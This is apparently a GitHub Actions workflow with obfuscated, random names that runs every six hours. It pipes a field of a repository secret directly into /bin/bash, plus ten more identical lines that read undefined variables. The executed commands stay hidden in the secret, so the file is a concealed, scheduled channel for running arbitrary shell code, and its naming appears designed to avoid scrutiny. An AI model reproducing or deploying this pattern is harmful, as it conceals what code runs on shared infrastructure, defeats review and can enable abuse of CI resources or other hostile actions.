name: wangsulong7654

on:
  workflow_dispatch:
  schedule:
    - cron: '4 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wangsulong7654
        env:
          o33: ${{ secrets.o33 }}
        run: |
          echo $o33 | jq -r .qoxyg50 | /bin/bash
          echo $kl9962 | jq -r .aow34 | /bin/bash
          echo $nfxg3 | jq -r .ql8549 | /bin/bash
          echo $whe6265 | jq -r .y1609 | /bin/bash
          echo $pdhx776 | jq -r .yic8 | /bin/bash
          echo $tf299 | jq -r .zw753 | /bin/bash
          echo $femgu79656 | jq -r .jwea8150 | /bin/bash
          echo $qjheg14590 | jq -r .qh03934 | /bin/bash
          echo $dgyek4 | jq -r .ezxdx8286 | /bin/bash
          echo $f4 | jq -r .qc123 | /bin/bash
          echo $ndagw913 | jq -r .ms2 | /bin/bash

